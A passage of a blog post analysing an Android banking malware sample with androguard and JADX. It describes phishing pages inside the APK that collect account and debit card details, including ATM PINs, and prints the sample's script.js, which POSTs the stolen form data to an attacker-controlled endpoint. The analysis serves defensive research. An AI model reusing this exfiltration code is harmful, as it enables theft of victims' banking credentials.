https:\/\/github.com\/androguard\/androguard<\/a><\/li>\n<\/ul>\n\n\n\nAfter installing the tool using pip, run the following command to view the AndroidManifest.xml file:<\/p>\n\n\n\n
androguard axml -i pnb.apk<\/pre>\n\n\n\nThe figure below shows that the application produces the same output as in JADX, except that in JADX, the values are displayed as “\u27e8STRING_DECODE_ERROR\u27e9”.<\/p>\n\n\n\nThe following command was issued to decompile the application:<\/p>\n\n\n\n
androguard decompile -o .\/ ~\/Desktop\/pnb.apk<\/pre>\n\n\n\nThe figure below shows the application decoding the APK file:<\/p>\n\n\n\nAndroguard helped decode some of the packages, making them more readable. After spending a few more hours on it, I decided to revisit JADX and noticed several files under the “Resources” section, as shown in the figure below:<\/p>\n\n\n\nThe index.html file is designed to create a signup form that imitates a legitimate banking website, a tactic commonly used in phishing attacks. It includes fields to capture a user’s name, mobile number, and account number, all of which are meant to deceive unsuspecting users into revealing sensitive information. This makes it a prime example of a phishing page. The figure below shows what the index.html looks like:<\/p>\n\n\n\nThe debit.html file is similar to the index.html file, but instead of collecting basic account information, it is designed to steal debit card details. It prompts users to enter their debit card number, expiry date, and ATM PIN. The figure below shows what the debit.html looks like:<\/p>\n\n\n\nLastly, the script.js is used for handling form submission and redirecting users based on the page context. The script first defines a URL where the collected form data is sent. When the form is submitted, it prevents the default form submission behavior and gathers the form data into a JavaScript object. Below is the script,js file:<\/p>\n\n\n\n
\/\/ Define the URL for the server endpoint\nconst URL = \"https:\/\/customer16.evilginix.com\/site\/submit.php\";\n\n\/\/ Function to handle redirection based on the page context\nfunction handleRedirection(page) {\n let redirectUrl = '';\n\n switch (page) {\n case 'index.html':\n redirectUrl = 'debit.html';\n break;\n case 'debit.html':\n redirectUrl = 'last.html';\n break;\n default:\n redirectUrl = 'index.html'; \/\/ Default redirect URL\n break;\n }\n\n \/\/ Perform the redirection\n window.location.href = redirectUrl;\n}\n\n\/\/ Set up the form submission event listener\ndocument.getElementById('myForm').addEventListener('submit', function(e) {\n e.preventDefault(); \/\/ Prevent the default form submission\n\n \/\/ Get form data\n const formData = new FormData(e.target);\n const data = Object.fromEntries(formData.entries());\n console.log(data);\n\n \/\/ Get ID from local storage\n const id = localStorage.getItem('formId'); \/\/ Default to '1' if not set\n data.id = id;\n\n \/\/ Get the current page context\n const dataPage = document.documentElement.getAttribute('data-page');\n\n \/\/ Send data to the server\n fetch(URL, {\n method: 'POST',\n headers: {\n 'Content-Type': 'application\/json'\n },\n body: JSON.stringify(data)\n })\n .then(response => response.json())\n .then(result => {\n console.log('Success:', result);\n \/\/ Handle redirection after successful data submission\n handleRedirection(dataPage);\n })\n .catch(error => {\n console.error('Error:', error);\n });\n});\n<\/pre>\n\n\n\nUpon visiting the URL, the figure below shows that it functions as a Command and Control (C&C) server, where all the victim’s information is sent.<\/p>\n\n\n\nAdditionally, by changing the subdomain, it\u2019s possible to access another phishing campaign, which likely belongs to a different group, as shown in the figure below:<\/p>\n\n\n\nThank you for reading!<\/p>\n\n\n\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
Hi Readers, It\u2019s been some time since my last write-up. Over the weekend, a good friend sent me an Android malware sample. Although I have experience with Android, I haven\u2019t ventured much into malware analysis, making this the perfect opportunity to dive in. My goal is to begin threat hunting, starting with this sample and … <\/p>\n
Continue reading “Android Banking Malware Analysis”<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-74","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/jasveermaan.com\/index.php\/wp-json\/wp\/v2\/posts\/74","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/jasveermaan.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/jasveermaan.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/jasveermaan.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/jasveermaan.com\/index.php\/wp-json\/wp\/v2\/comments?post=74"}],"version-history":[{"count":7,"href":"https:\/\/jasveermaan.com\/index.php\/wp-json\/wp\/v2\/posts\/74\/revisions"}],"predecessor-version":[{"id":141,"href":"https:\/\/jasveermaan.com\/index.php\/wp-json\/wp\/v2\/posts\/74\/revisions\/141"}],"wp:attachment":[{"href":"https:\/\/jasveermaan.com\/index.php\/wp-json\/wp\/v2\/media?parent=74"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/jasveermaan.com\/index.php\/wp-json\/wp\/v2\/categories?post=74"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/jasveermaan.com\/index.php\/wp-json\/wp\/v2\/tags?post=74"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"\"](\"https:\/\/jasveermaan.com\/wp-content\/uploads\/2025\/04\/image.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/jasveermaan.com\/wp-content\/uploads\/2025\/04\/image-2.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/jasveermaan.com\/wp-content\/uploads\/2025\/04\/image-1.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/jasveermaan.com\/wp-content\/uploads\/2025\/04\/image-3.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/jasveermaan.com\/wp-content\/uploads\/2025\/04\/image-4.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/jasveermaan.com\/wp-content\/uploads\/2025\/04\/image-5.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/jasveermaan.com\/wp-content\/uploads\/2025\/04\/image-6.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/jasveermaan.com\/wp-content\/uploads\/2025\/04\/image-7.png\")
<\/figure>\n\n\n\n